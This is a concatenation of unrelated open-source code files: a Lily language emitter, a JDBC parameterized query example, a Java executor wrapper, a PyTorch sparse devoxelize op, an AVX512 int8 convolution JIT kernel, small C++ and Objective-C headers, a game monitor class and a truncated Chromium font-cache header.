lily_foreign_func func, lily_import_entry *import, lily_type *type, char *name) { lily_var *new_var = lily_new_raw_unlinked_var(emit->symtab, type, name); new_var->next = import->var_chain; import->var_chain = new_var; new_var->reg_spot = emit->symtab->next_readonly_spot; emit->symtab->next_readonly_spot++; new_var->function_depth = 1; new_var->flags |= VAR_IS_READONLY; /* Make sure to use new_var->name, because the name parameter is a shallow copy of lex->label (and will be mutated). */ lily_function_val *func_val = lily_new_foreign_function_val(func, NULL, new_var->name); lily_tie_builtin(emit->symtab, new_var, func_val); return new_var; } lily_var *lily_emit_new_dyna_method_var(lily_emit_state *emit, lily_foreign_func func, lily_class *cls, lily_type *type, char *name) { lily_var *new_var = lily_new_raw_unlinked_var(emit->symtab, type, name); new_var->parent = cls; new_var->function_depth = 1; new_var->flags |= VAR_IS_READONLY; new_var->reg_spot = emit->symtab->next_readonly_spot; emit->symtab->next_readonly_spot++; new_var->next = cls->call_chain; cls->call_chain = new_var; lily_function_val *func_val = lily_new_foreign_function_val(func, cls->name, new_var->name); lily_tie_function(emit->symtab, new_var, func_val); return new_var; } lily_var *lily_emit_new_dyna_var(lily_emit_state *emit, lily_import_entry *import, lily_type *type, char *name) { lily_var *new_var = lily_new_raw_unlinked_var(emit->symtab, type, name); new_var->reg_spot = emit->main_block->next_reg_spot; emit->main_block->next_reg_spot++; new_var->function_depth = 1; new_var->next = import->var_chain; import->var_chain = new_var; return new_var; } /* Create the first block that will represent __main__, as well as __main__ itself. This first block will never be exited from. */ void lily_emit_enter_main(lily_emit_state *emit) { /* This adds the first storage and makes sure that the emitter can always know that emit->unused_storage_start is never NULL. */ add_storage(emit); lily_type *main_type = lily_new_type(emit->symtab, emit->symtab->function_class); /* This next part is only ok because __main__ is the first function and it is not possible for this type to be a duplicate of anything else. */ main_type->subtypes = lily_malloc(2 * sizeof(lily_type)); main_type->subtypes[0] = NULL; main_type->subtype_count = 1; main_type->generic_pos = 0; main_type->flags = 0; lily_var *main_var = lily_new_raw_var(emit->symtab, main_type, "__main__"); main_var->reg_spot = 0; main_var->function_depth = 1; main_var->flags |= VAR_IS_READONLY; emit->symtab->next_readonly_spot++; lily_block *main_block = lily_malloc(sizeof(lily_block)); lily_function_val *main_function = lily_new_native_function_val( NULL, main_var->name); emit->symtab->main_var = main_var; emit->symtab->main_function = main_function; /* __main__ is given two refs so that it must go through a custom deref to be destroyed. This is because the names in the function info it has are shared with vars that are still around. */ main_function->refcount++; lily_tie_function(emit->symtab, main_var, main_function); main_block->prev = NULL; main_block->next = NULL; main_block->block_type = BLOCK_FUNCTION; main_block->function_var = main_var; main_block->storage_start = emit->all_storage_start; main_block->class_entry = NULL; main_block->generic_count = 0; main_block->function_value = main_function; main_block->self = NULL; main_block->code_start = 0; main_block->jump_offset = 0; main_block->next_reg_spot = 0; emit->top_function = main_function; emit->top_var = main_var; emit->block = main_block; emit->function_depth++; emit->main_block = main_block; emit->function_block = main_block; }
72,864
1,139
<filename>CoreJavaProjects/JDBCPreparedStatementIN/src/com/journaldev/jdbc/preparedstatement/in/JDBCPreparedStatementDynamic.java package com.journaldev.jdbc.preparedstatement.in; import java.sql.Connection; import java.sql.PreparedStatement; import java.sql.ResultSet; import java.sql.SQLException; public class JDBCPreparedStatementDynamic { public static void printData(int[] ids){ String query = createQuery(ids.length); System.out.println("Query="+query); Connection con = DBConnection.getConnection(); PreparedStatement ps = null; ResultSet rs = null; try { ps = con.prepareStatement(query); for(int i = 1; i <=ids.length; i++){ ps.setInt(i, ids[i-1]); } rs = ps.executeQuery(); while(rs.next()){ System.out.println("Employee ID="+rs.getInt("empid")+", Name="+rs.getString("name")); } //close the resultset here try{ rs.close(); } catch(SQLException e){} } catch (SQLException e) { e.printStackTrace(); }finally{ try { ps.close(); con.close(); } catch (SQLException e) { e.printStackTrace(); } } } private static String createQuery(int length) { String query = "select empid, name from Employee where empid in ("; StringBuilder queryBuilder = new StringBuilder(query); for( int i = 0; i< length; i++){ queryBuilder.append(" ?"); if(i != length -1) queryBuilder.append(","); } queryBuilder.append(")"); return queryBuilder.toString(); } }
596
1,085
<gh_stars>1000+ /* * Copyright (C) 2017-2019 Dremio Corporation * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.dremio.common.concurrent; import java.util.concurrent.Callable; import java.util.concurrent.ScheduledExecutorService; import java.util.concurrent.ScheduledFuture; import java.util.concurrent.TimeUnit; import io.opentracing.Tracer; public class ScheduledContextMigratingExecutorService<E extends ScheduledExecutorService> extends ContextMigratingExecutorService implements ScheduledExecutorService { public ScheduledContextMigratingExecutorService(E delegate, Tracer tracer) { super(delegate, tracer); } @Override public ScheduledFuture<?> schedule(Runnable command, long delay, TimeUnit unit) { return ((ScheduledExecutorService)getDelegate()).schedule(decorate(command), delay, unit); } @Override public <V> ScheduledFuture<V> schedule(Callable<V> callable, long delay, TimeUnit unit) { return ((ScheduledExecutorService)getDelegate()).schedule(decorate(callable), delay, unit); } @Override public ScheduledFuture<?> scheduleAtFixedRate(Runnable command, long initialDelay, long period, TimeUnit unit) { return ((ScheduledExecutorService)getDelegate()).scheduleAtFixedRate(decorate(command), initialDelay, period, unit); } @Override public ScheduledFuture<?> scheduleWithFixedDelay(Runnable command, long initialDelay, long delay, TimeUnit unit) { return ((ScheduledExecutorService)getDelegate()).scheduleWithFixedDelay(decorate(command), initialDelay, delay, unit); } }
827
428
import torch from torch.autograd import Function from torch.cuda.amp import custom_bwd, custom_fwd import torchsparse.backend __all__ = ['spdevoxelize', 'calc_ti_weights'] def calc_ti_weights(coords: torch.Tensor, idx_query: torch.Tensor, scale: float = 1) -> torch.Tensor: with torch.no_grad(): p = coords if scale != 1: pf = torch.floor(coords / scale) * scale else: pf = torch.floor(coords) pc = pf + scale x = p[:, 0].view(-1, 1) y = p[:, 1].view(-1, 1) z = p[:, 2].view(-1, 1) xf = pf[:, 0].view(-1, 1).float() yf = pf[:, 1].view(-1, 1).float() zf = pf[:, 2].view(-1, 1).float() xc = pc[:, 0].view(-1, 1).float() yc = pc[:, 1].view(-1, 1).float() zc = pc[:, 2].view(-1, 1).float() w0 = (xc - x) * (yc - y) * (zc - z) w1 = (xc - x) * (yc - y) * (z - zf) w2 = (xc - x) * (y - yf) * (zc - z) w3 = (xc - x) * (y - yf) * (z - zf) w4 = (x - xf) * (yc - y) * (zc - z) w5 = (x - xf) * (yc - y) * (z - zf) w6 = (x - xf) * (y - yf) * (zc - z) w7 = (x - xf) * (y - yf) * (z - zf) w = torch.cat([w0, w1, w2, w3, w4, w5, w6, w7], dim=1) w = w.transpose(1, 0).contiguous() if scale != 1: w /= scale ** 3 w[idx_query == -1] = 0 w /= torch.sum(w, dim=0) + 1e-8 return w class DevoxelizeFunction(Function): @staticmethod @custom_fwd(cast_inputs=torch.half) def forward(ctx, feats: torch.Tensor, coords: torch.Tensor, weights: torch.Tensor) -> torch.Tensor: feats = feats.contiguous() coords = coords.contiguous().int() weights = weights.contiguous() if feats.device.type == 'cuda': output = torchsparse.backend.devoxelize_forward_cuda( feats, coords, weights) elif feats.device.type == 'cpu': output = torchsparse.backend.devoxelize_forward_cpu( feats, coords, weights) else: device = feats.device output = torchsparse.backend.devoxelize_forward_cpu( feats.cpu(), coords.cpu(), weights.cpu()).to(device) ctx.for_backwards = (coords, weights, feats.shape[0]) return output @staticmethod @custom_bwd def backward(ctx, grad_output: torch.Tensor): coords, weights, input_size = ctx.for_backwards grad_output = grad_output.contiguous() if grad_output.device.type == 'cuda': grad_feats = torchsparse.backend.devoxelize_backward_cuda( grad_output, coords, weights, input_size) elif grad_output.device.type == 'cpu': grad_feats = torchsparse.backend.devoxelize_backward_cpu( grad_output, coords, weights, input_size) else: device = grad_output.device grad_feats = torchsparse.backend.devoxelize_backward_cpu( grad_output.cpu(), coords.cpu(), weights.cpu(), input_size).to(device) return grad_feats, None, None def spdevoxelize(feats: torch.Tensor, coords: torch.Tensor, weights: torch.Tensor) -> torch.Tensor: return DevoxelizeFunction.apply(feats, coords, weights)
1,719
533
<gh_stars>100-1000 #include "saber/funcs/impl/x86/x86_utils.h" #include "saber/funcs/impl/x86/kernel/jit_avx512_core_u8s8s32x_conv_act_pool_kernel.h" namespace anakin { namespace saber { namespace jit { #define GET_OFF(field) offsetof(jit_conv_call_t, field) using namespace Xbyak; static inline void pick_loop_order(jit_conv_conf_t &jcp) { jcp.loop_order = loop_cgn; if (jcp.ngroups > 1) { jcp.loop_order = loop_ngc; } } bool jit_avx512_core_u8s8s32x_conv_act_pool_kernel::maybe_relu(int position, const float *post_sum) { if (position == 0) { /* if do sum, then skip relu before sum */ if (post_sum) { return false; } return false || jcp.with_relu; } else if (position == 1) { /* relu after sum */ if (post_sum == nullptr) { return false; } return false || jcp.dst_dt == AK_UINT8 || jcp.with_relu; } return false; } void jit_avx512_core_u8s8s32x_conv_act_pool_kernel::prepare_output(int ur_w) { for (int k = 0; k < jcp.nb_oc_blocking; k++) { for (int j = 0; j < ur_w; j++) { Zmm zmm = zmm_out(j, k); vpxord(zmm, zmm, zmm); } } } void jit_avx512_core_u8s8s32x_conv_act_pool_kernel::store_unit(DataType type_out, zmm_t zmm_in, int aux_output_offset, bool mask_flag) { auto addr = EVEX_compress_addr(reg_out, aux_output_offset); zmm_t r_zmm = mask_flag ? zmm_in | ktail_mask : zmm_in; switch (type_out) { case AK_FLOAT: case AK_INT32: vmovups(addr, r_zmm); break; case AK_INT8: vpmovsdb(addr, r_zmm); break; case AK_UINT8: vpmovusdb(addr, r_zmm); break; default: assert(!"unknown dst_dt"); } } void jit_avx512_core_u8s8s32x_conv_act_pool_kernel::cvt2ps(DataType type_in, zmm_t zmm_in, const Xbyak::Operand &op, bool mask_flag) { zmm_t zmm = mask_flag ? zmm_in | ktail_mask | T_z : zmm_in; switch (type_in) { case AK_FLOAT: case AK_INT32: vmovups(zmm, op); break; case AK_INT8: vpmovsxbd(zmm, op); break; case AK_UINT8: vpmovzxbd(zmm, op); break; default: assert(!"unsupported data type"); } if (type_in != AK_FLOAT) { vcvtdq2ps(zmm_in, zmm_in); } } void jit_avx512_core_u8s8s32x_conv_act_pool_kernel::store_output(int ur_w, int last_oc_block_flag) { int nb_oc_block = jcp.nb_oc_blocking; mov(reg_bias, ptr[param1 + GET_OFF(bias)]); mov(reg_ptr_scales, ptr[param1 + GET_OFF(scales)]); const float *p_sum_scale = nullptr; if (jcp.with_sum) { p_sum_scale = &(jcp.sum_scale); } if (p_sum_scale && *p_sum_scale != 1.f) { mov(reg_ptr_sum_scale, (size_t)p_sum_scale); } vpxord(zmm_zero, zmm_zero, zmm_zero); for (int k = 0; k < nb_oc_block; k++) { const bool mask_flag = last_oc_block_flag == 1 && k == nb_oc_block - 1; int scale_offset = jcp.is_oc_scale * (sizeof(float) * k * jcp.oc_block); auto zmm_bias = zmm_tmp; if (jcp.with_bias) { int bias_offset = jcp.typesize_bia * k * jcp.oc_block; auto bias_addr = EVEX_compress_addr(reg_bias, bias_offset); cvt2ps(jcp.bia_dt, zmm_bias, bias_addr, mask_flag); } for (int j = 0; j < ur_w; j++) { int aux_output_offset = jcp.typesize_out * (k * jcp.oc_block + j * jcp.oc_without_padding * jcp.ngroups); auto addr = EVEX_compress_addr(reg_out, aux_output_offset); Zmm zmm = zmm_out(j, k); vcvtdq2ps (zmm, zmm); if (jcp.with_bias) { vaddps(zmm, zmm, zmm_bias); } zmm_t mask_zmm = mask_flag ? zmm | ktail_mask | T_z : zmm; vmulps(mask_zmm, zmm, EVEX_compress_addr(reg_ptr_scales, scale_offset)); if (maybe_relu(0, p_sum_scale)) { vmaxps(zmm, zmm_zero, zmm); } if (p_sum_scale) { // post_op: sum auto zmm_prev_dst = zmm_bcast; cvt2ps(jcp.dst_dt, zmm_prev_dst, addr, mask_flag); if (*p_sum_scale == 1.f) { vaddps(zmm, zmm_prev_dst); } else { vfmadd231ps(zmm, zmm_prev_dst, zword_b[reg_ptr_sum_scale]); } } if (maybe_relu(1, p_sum_scale)) { vmaxps(zmm, zmm_zero, zmm); } if (jcp.dst_dt != AK_FLOAT) { if (jcp.rm == round_mode::nearest) { vcvtps2dq(zmm | T_rn_sae, zmm); } else if (jcp.rm == round_mode::down) { vcvtps2dq(zmm | T_rd_sae, zmm); } else { assert(!"unimplemented"); } } } bool with_partial_pool = jcp.with_partial_pool; if (!with_partial_pool) { for (int j = 0; j < ur_w; j++) { int aux_output_offset = jcp.typesize_out * (k * jcp.oc_block + j * jcp.oc_without_padding * jcp.ngroups); Zmm zmm = zmm_out(j, k); store_unit(jcp.dst_dt, zmm, aux_output_offset, mask_flag); } } else { int pool_w = jcp.pool_kw; int full_size_num = ur_w / pool_w; for (int j = 0; j < full_size_num; j++) { int aux_output_offset = jcp.typesize_out * (k * jcp.oc_block + (j) * jcp.oc_without_padding * jcp.ngroups); Zmm zmm0 = zmm_out(j * pool_w, k); for (int i = 1; i < pool_w; i++) { Zmm zmm1 = zmm_out(j * pool_w + i, k); switch (jcp.pool_alg) { case Pooling_max: vpcmpd(pool_k_cmp_mask, zmm0, zmm1, _cmp_lt_os); vpblendmd(zmm0 | pool_k_cmp_mask, zmm0, zmm1); break; case Pooling_average_include_padding: case Pooling_average_exclude_padding: vpaddd(zmm0, zmm0, zmm1); break; default: assert(!"unimplemented"); } } store_unit(jcp.dst_dt, zmm0, aux_output_offset, mask_flag); } } } } void jit_avx512_core_u8s8s32x_conv_act_pool_kernel::compute_ker(int ur_w, int pad_l, int pad_r, int last_ic_block_flag) { int kw = jcp.kw; int stride_w = jcp.stride_w; int ic_block = jcp.ic_block; int oc_block = jcp.oc_block; int ch_block_all = jcp.ch_block * ic_block * oc_block; int nb_oc_block = jcp.nb_oc_blocking; Label kh_label; Label skip_kh_loop; int shift_kernel_ptr = jcp.typesize_in * jcp.kw * ch_block_all; int shift_input_ptr = jcp.typesize_in * (jcp.dilate_h + 1) * jcp.iw * jcp.ic_without_padding * jcp.ngroups; auto input_offset = [=](int oi, int ic, int ki) { return jcp.typesize_in * ((ki * (jcp.dilate_w + 1) + oi * stride_w - pad_l) * jcp.ic_without_padding * jcp.ngroups + 4 * ic); }; auto kernel_offset = [=](int ii, int ic, int ki) { return jcp.typesize_in * ((ii * jcp.nb_ic * jcp.kh * jcp.kw + ki) * ch_block_all + 4 * ic * oc_block); }; auto compute = [=](Zmm vreg_acc, Zmm vreg_wei, Zmm vreg_src) { if (jcp.ver == ver_vnni) { // also okay for depthwise since src is zero-extended vpdpbusd(vreg_acc, vreg_src, vreg_wei); } else if (jcp.is_dw) { vpmulld(zmm_tmp, vreg_src, vreg_wei); vpaddd(vreg_acc, vreg_acc, zmm_tmp); } else { vpmaddubsw(zmm_tmp, vreg_src, vreg_wei); vpmaddwd(zmm_tmp, zmm_tmp, zmm_one); vpaddd(vreg_acc, vreg_acc, zmm_tmp); } }; mov(aux_reg_inp, reg_inp); mov(aux_reg_ker, reg_ker); mov(reg_kj, reg_kh); if ((jcp.kh - 1) * (jcp.dilate_h + 1) < std::max(jcp.t_pad, jcp.b_pad)) { cmp(reg_kj, 0); je(skip_kh_loop, T_NEAR); } L(kh_label); { for (int ki = 0; ki < kw; ki++) { int jj_start = get_ow_start(ki, pad_l); int jj_end = get_ow_end(ur_w, ki, pad_r); int tail_size = jcp.ic_without_padding % 4; /* Skip the last loads of input if (ic%16)/4 < ic_block/4 */ int icb = jcp.is_dw ? 1 : (last_ic_block_flag != no_last_block) ? utils::div_up((jcp.ic_without_padding % ic_block), 4) : ic_block / 4; for (int ic = 0; ic < icb; ic++) { for (int jj = jj_start; jj < jj_end; jj++) { int aux_input_offset = input_offset(jj, ic, ki); if (jcp.is_dw) { vpmovzxbd(zmm_inp(jj, nb_oc_block), EVEX_compress_addr( aux_reg_inp, aux_input_offset)); } else if (last_ic_block_flag == last_sp_block && tail_size != 0 && ic == icb - 1) { Xmm xmm_tmp = Xmm(zmm_inp(jj, nb_oc_block).getIdx()); for (int r = 0; r < tail_size; ++r) { vpinsrb(xmm_tmp, xmm_tmp, ptr[aux_reg_inp + aux_input_offset + r], r); } vpbroadcastd(zmm_inp(jj, nb_oc_block), xmm_tmp); } else { vpbroadcastd(zmm_inp(jj, nb_oc_block), EVEX_compress_addr(aux_reg_inp, aux_input_offset)); } } for (int ii = 0; ii < nb_oc_block; ii++) { int aux_kernel_offset = kernel_offset(ii, ic, ki); if (jj_end - jj_start > 0) { if (jcp.is_dw) { vpmovsxbd(zmm_wei, EVEX_compress_addr(aux_reg_ker, aux_kernel_offset)); } else { vmovups(zmm_wei, EVEX_compress_addr(aux_reg_ker, aux_kernel_offset)); } } for (int jj = jj_start; jj < jj_end; jj++) { compute(zmm_out(jj, ii), zmm_wei, zmm_inp(jj, nb_oc_block)); } } } } add(aux_reg_ker, shift_kernel_ptr); add(aux_reg_inp, shift_input_ptr); dec(reg_kj); cmp(reg_kj, 0); jg(kh_label, T_NEAR); } L(skip_kh_loop); } void jit_avx512_core_u8s8s32x_conv_act_pool_kernel::compute_loop(int ur_w, int pad_l, int pad_r, bool is_last_sp_block) { prepare_output(ur_w); // IC loop Label icb_label; mov(reg_icb, jcp.nb_ic); L(icb_label); if (jcp.ic_without_padding != jcp.ic) { Label common_ker; Label end_ker; cmp(reg_icb, 1); // The last IC block jne(common_ker, T_NEAR); compute_ker(ur_w, pad_l, pad_r, is_last_sp_block ? last_sp_block : last_ic_block); jmp(end_ker, T_NEAR); L(common_ker); compute_ker(ur_w, pad_l, pad_r, no_last_block); L(end_ker); } else { compute_ker(ur_w, pad_l, pad_r, no_last_block); } // End of IC Loop int inp_step = jcp.ic_block; int ker_step = jcp.kh * jcp.kw * jcp.oc_block * jcp.ic_block; add(reg_inp, jcp.typesize_in * inp_step); add(reg_ker, jcp.typesize_in * ker_step); dec(reg_icb); cmp(reg_icb, 0); jg(icb_label, T_NEAR); sub(reg_inp, jcp.typesize_in * inp_step * jcp.nb_ic); sub(reg_ker, jcp.typesize_in * ker_step * jcp.nb_ic); if (jcp.ngroups % jcp.ch_block != 0 || jcp.oc_without_padding != jcp.oc) { Label common_store; Label end_store; if (jcp.is_dw) { cmp(reg_oc_blocks, jcp.nb_ch - 1); } else { cmp(reg_oc_blocks, jcp.nb_oc - jcp.nb_oc_blocking); } jne(common_store, T_NEAR); store_output(ur_w, 1); jmp(end_store, T_NEAR); L(common_store); store_output(ur_w, 0); L(end_store); } else { store_output(ur_w, 0); } } void jit_avx512_core_u8s8s32x_conv_act_pool_kernel::generate() { int inp_shift_pad = jcp.typesize_in * (jcp.ur_w * jcp.stride_w - jcp.l_pad) * jcp.ic_without_padding * jcp.ngroups; int inp_shift = jcp.typesize_in * (jcp.ur_w * jcp.stride_w * jcp.ic_without_padding * jcp.ngroups); int out_shift = jcp.typesize_out * (jcp.ur_w * jcp.oc_without_padding * jcp.ngroups); if (jcp.with_partial_pool) { out_shift = jcp.typesize_out * ((jcp.ur_w / jcp.pool_kw) * jcp.oc_without_padding * jcp.ngroups); } preamble(); xor_(reg_scratch, reg_scratch); Reg16 _t = reg_scratch.cvt16(); mov(_t, 0x1); vpbroadcastw(zmm_one, _t); mov(reg_inp, ptr[param1 + GET_OFF(src)]); mov(reg_out, ptr[param1 + GET_OFF(dst)]); mov(reg_ker, ptr[param1 + GET_OFF(filt)]); mov(reg_kh, ptr[param1 + GET_OFF(kh_padding)]); if (jcp.ngroups % jcp.ch_block != 0 || jcp.oc_without_padding != jcp.oc) { int tail_size = jcp.is_dw ? jcp.ngroups % jcp.ch_block : jcp.oc_without_padding % jcp.oc_block; int mask = (1 << tail_size) - 1; mov(reg_oc_blocks, ptr[param1 + GET_OFF(oc_blocks)]); Reg32 regw_tmp = reg_oi.cvt32(); mov(regw_tmp, mask); kmovw(ktail_mask, regw_tmp); } int r_pad = std::max(0, (jcp.ow - 1) * jcp.stride_w + (jcp.kw - 1) * (jcp.dilate_w + 1) - (jcp.iw + jcp.l_pad - 1)); int n_oi = jcp.ow / jcp.ur_w; int r_pad1 = (jcp.ur_w * n_oi - 1) * jcp.stride_w + (jcp.kw - 1) * (jcp.dilate_w + 1) - (jcp.iw + jcp.l_pad - 1); if (r_pad1 > 0 || jcp.ur_w_tail == 0) { n_oi--; } xor_(reg_oi, reg_oi); if (jcp.ow == jcp.ur_w) { compute_loop(jcp.ur_w, jcp.l_pad, r_pad, true); } else { if (n_oi == 0) { compute_loop(jcp.ur_w, jcp.l_pad, r_pad1, jcp.ur_w_tail == 0); add(reg_inp, inp_shift_pad); add(reg_out, out_shift); if (jcp.ur_w_tail != 0) { compute_loop(jcp.ur_w_tail, 0, r_pad, true); } } else { if (jcp.l_pad > 0) { compute_loop(jcp.ur_w, jcp.l_pad, 0, false); add(reg_inp, inp_shift_pad); add(reg_out, out_shift); inc(reg_oi); } if ((jcp.l_pad <= 0 && n_oi > 0) || (jcp.l_pad > 0 && n_oi > 1)) { Label ow_loop_label; L(ow_loop_label); { compute_loop(jcp.ur_w, 0, 0, false); add(reg_inp, inp_shift); add(reg_out, out_shift); inc(reg_oi); cmp(reg_oi, n_oi); jl(ow_loop_label, T_NEAR); } } if (r_pad1 > 0 || jcp.ur_w_tail == 0) { compute_loop(jcp.ur_w, 0, r_pad1, jcp.ur_w_tail == 0); add(reg_inp, inp_shift); add(reg_out, out_shift); } if (jcp.ur_w_tail != 0) { compute_loop(jcp.ur_w_tail, 0, r_pad, true); } } } postamble(); } SaberStatus jit_avx512_core_u8s8s32x_conv_act_pool_kernel::init_conf(jit_conv_conf_t &jcp) { SaberStatus ret = SaberUnImplError; const int regs = 28; // TODO /* if (!(mayiuse(avx512_core) && src_d.data_type() == data_type::u8 && weights_d.data_type() == data_type::s8 && one_of(dst_d.data_type(), data_type::f32, data_type::s32, data_type::s8, data_type::u8))) return status::unimplemented; if (!implication(with_relu, relu_negative_slope == 0.)) return status::unimplemented; */ using namespace utils; if (jcp.is_dw) { jcp.ch_block = 16; jcp.ic_block = 1; jcp.oc_block = 1; if (jcp.ngroups % jcp.ch_block != 0) { return ret; } } else { jcp.ch_block = 1; jcp.ic_block = 16; jcp.oc_block = 16; if (jcp.ngroups == 1) { jcp.oc = rnd_up(jcp.oc, jcp.oc_block); jcp.ic = rnd_up(jcp.ic, jcp.ic_block); } if (jcp.ic % jcp.ic_block != 0) { return ret; } } jcp.ver = ver_avx512_core; if (mayiuse(avx512_core_vnni)) { jcp.ver = ver_vnni; } /*TOTO const auto w_format = with_groups ? (jcp.is_dw ? Goihw16g : gOIhw4i16o4i) : OIhw4i16o4i; if (weights_d.format() == any) CHECK(weights_pd.set_format(w_format)); if (weights_d.format() != w_format) return status::unimplemented; if (dst_d.format() == any) CHECK(dst_pd.set_format(nhwc)); if (dst_d.format() != nhwc) return status::unimplemented; if (src_d.format() == any) CHECK(src_pd.set_format(nhwc)); if (src_d.format() != nhwc) return status::unimplemented; if (jcp.with_bias) { if (bias_d.format() == any) CHECK(bias_pd.set_format(x)); if (bias_d.format() != x) return status::unimplemented; } jcp.bia_dt = jcp.with_bias ? cd.bias_desc.data_type : data_type::undef; jcp.dst_dt = cd.dst_desc.data_type; jcp.typesize_in = types::data_type_size(src_d.data_type()); jcp.typesize_out = types::data_type_size(dst_d.data_type()); jcp.typesize_acc = sizeof(int32_t); jcp.typesize_bia = jcp.with_bias ? types::data_type_size(bias_d.data_type()) : 0; */ jcp.typesize_in = 1; jcp.typesize_out = datatype_size(jcp.dst_dt); jcp.typesize_bia = jcp.with_bias ? datatype_size(jcp.bia_dt) : 0; jcp.nb_ch = div_up(jcp.ngroups, jcp.ch_block); jcp.nb_ic = jcp.ic / jcp.ic_block; jcp.nb_oc = jcp.oc / jcp.oc_block; // If OC blocking is incommensurate with the number of OC blocks (general // requirement for all convolutions), or if it results in an unrolling // factor smaller than the left padding (special requirement for SSD:fc6), // then search for a smaller OC blocking that satisfies both constraints. jcp.nb_oc_blocking = std::min(4, jcp.nb_oc); for (; jcp.nb_oc_blocking > 1; jcp.nb_oc_blocking--) { if (jcp.nb_oc % jcp.nb_oc_blocking == 0 && jcp.l_pad <= regs / (jcp.nb_oc_blocking + 1)) { break; } } jcp.ur_w = regs / (jcp.nb_oc_blocking + 1); if (jcp.ur_w % jcp.pool_kw) jcp.ur_w = (jcp.ur_w / jcp.pool_kw) * jcp.pool_kw; if (jcp.ow < jcp.ur_w) { jcp.ur_w = jcp.ow; } jcp.ur_w_tail = jcp.ow % jcp.ur_w; bool args_ok = true && jcp.oc % jcp.oc_block == 0 && jcp.ur_w != 0 && jcp.ur_w_tail % jcp.pool_kw == 0 && jcp.l_pad <= jcp.ur_w && implication(!jcp.is_1stconv, jcp.ic % jcp.ic_block == 0); if (!args_ok) { return ret; } int r_pad_no_tail = std::max(0, (jcp.ow - jcp.ur_w_tail - 1) * jcp.stride_w + (jcp.kw - 1) * (jcp.dilate_w + 1) - (jcp.iw + jcp.l_pad - 1)); if (r_pad_no_tail > jcp.ur_w) { return ret; } pick_loop_order(jcp); jcp.nb_ic_L2 = jcp.nb_ic; jcp.is_oc_scale = 1; /* TODO const auto &oscales = attr.output_scales_; jcp.is_oc_scale = oscales.mask_ == 1 << 1; assert(utils::implication(!jcp.is_oc_scale, oscales.mask_ == 0)); */ return SaberSuccess; } } // namespace jit } // namespace saber } // namespace anakin // vim: et ts=4 sw=4 cindent cino^=l0,\:0,N-s
12,689
3,366
#ifndef _NOTQUERY_H #define _NOTQUERY_H #include<memory> using std::shared_ptr; #include<string> using std::string; #include"query.h" #include"query_base.h" class QueryResult; class TextQuery; class NotQuery :public Query_base { friend Query operator~(const Query&); //call Query's default copy constructor. NotQuery(const Query &q) :query(q){} string rep() const{ return "~(" + query.rep() + ")"; } QueryResult eval(const TextQuery&) const; Query query; }; inline Query operator~(const Query &operand) { return shared_ptr<Query_base>(new NotQuery(operand)); } #endif
206
1,341
<filename>ObjcExample/ObjcExample/Demo/GKPageScrollView/网易云音乐/GKWYHeaderView.h // // GKWYHeaderView.h // GKPageScrollView // // Created by QuintGao on 2018/10/28. // Copyright © 2018 QuintGao. All rights reserved. // #import <UIKit/UIKit.h> NS_ASSUME_NONNULL_BEGIN #define kWYHeaderHeight (kScreenW * 500.0f / 750.0f - kNavBarHeight) @interface GKWYHeaderView : UIView @property (nonatomic, strong) UILabel *nameLabel; @end NS_ASSUME_NONNULL_END
211
2,226
#pragma once #ifndef ES_APP_GUIS_GUI_GENERAL_SCREENSAVER_OPTIONS_H #define ES_APP_GUIS_GUI_GENERAL_SCREENSAVER_OPTIONS_H #include "GuiScreensaverOptions.h" class GuiGeneralScreensaverOptions : public GuiScreensaverOptions { public: GuiGeneralScreensaverOptions(Window* window, const char* title); virtual ~GuiGeneralScreensaverOptions(); private: void openVideoScreensaverOptions(); void openSlideshowScreensaverOptions(); }; #endif // ES_APP_GUIS_GUI_GENERAL_SCREENSAVER_OPTIONS_H
183
1,025
package org.menacheri.zombie.domain; import org.menacheri.jetserver.app.GameRoom; import org.menacheri.jetserver.app.Task; import org.menacheri.jetserver.communication.DeliveryGuaranty.DeliveryGuarantyOptions; import org.menacheri.jetserver.communication.NettyMessageBuffer; import org.menacheri.jetserver.event.Events; import org.menacheri.jetserver.event.NetworkEvent; import org.menacheri.jetserver.protocols.impl.WebSocketProtocol; import org.menacheri.zombie.game.Messages; public class WorldMonitor implements Task { private World world; private GameRoom room; private Object id; public WorldMonitor(World world, GameRoom room) { this.world = world; this.room = room; } public World getWorld() { return world; } public void setWorld(World world) { this.world = world; } @Override public Object getId() { return id; } @Override public void run() { if(world.apocalypse()) { // Send it to all players System.out.println("Apocalypse is here"); NetworkEvent networkEvent = Events.networkEvent(Messages.apocalypse()); room.sendBroadcast(networkEvent); } else { NetworkEvent networkEvent = null; if(room.getProtocol() instanceof WebSocketProtocol) { networkEvent = Events.networkEvent(world.getAlive()); } else { NettyMessageBuffer buffer = new NettyMessageBuffer(); buffer.writeInt(world.getAlive()); networkEvent = Events.networkEvent(buffer,DeliveryGuarantyOptions.FAST); } room.sendBroadcast(networkEvent); } world.report(); } @Override public void setId(Object id) { this.id = id; } public GameRoom getRoom() { return room; } public void setRoom(GameRoom room) { this.room = room; } }
637
903
<gh_stars>100-1000 #include "../../src/corelib/kernel/qfunctions_wince.h"
32
681
<reponame>nahimr/REDRIVER2 enum GameStates { STATE_NONE = 0, STATE_INITFRONTEND, STATE_FRONTEND, STATE_GAMESTART, STATE_GAMELAUNCH, // launch single game STATE_LADDER, // launch a mission ladder STATE_GAMEINIT, STATE_GAMELOOP, STATE_GAMECOMPLETE, STATE_FMVPLAY, }; // changes the state extern void SetState(GameStates newState, void* param = NULL); // does the state loop extern void DoStateLoop();
165
14,668
// Copyright 2020 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #ifndef CONTENT_BROWSER_FONT_ACCESS_FONT_ENUMERATION_CACHE_WIN_H_ #define CONTENT_BROWSER_FONT_ACCESS_FONT_ENUMERATION_CACHE_WIN_H_ #include <dwrite.h> #include <stdint.h> #include <wrl/client.h> #include <map> #include <memory> #include <string> #include "base/memory/read_only_shared_memory_region.h" #include "base/sequence_checker.h" #include "base/synchronization/atomic_flag.h" #include "base/thread_annotations.h" #include "base/types/pass_key.h" #include "content/browser/font_access/font_enumeration_cache.h" #include "content/common/content_export.h" #include "third_party/abseil-cpp/absl/types/optional.h" #include "third_party/blink/public/common/font_access/font_enumeration_table.pb.h" namespace content { // Windows implementation of 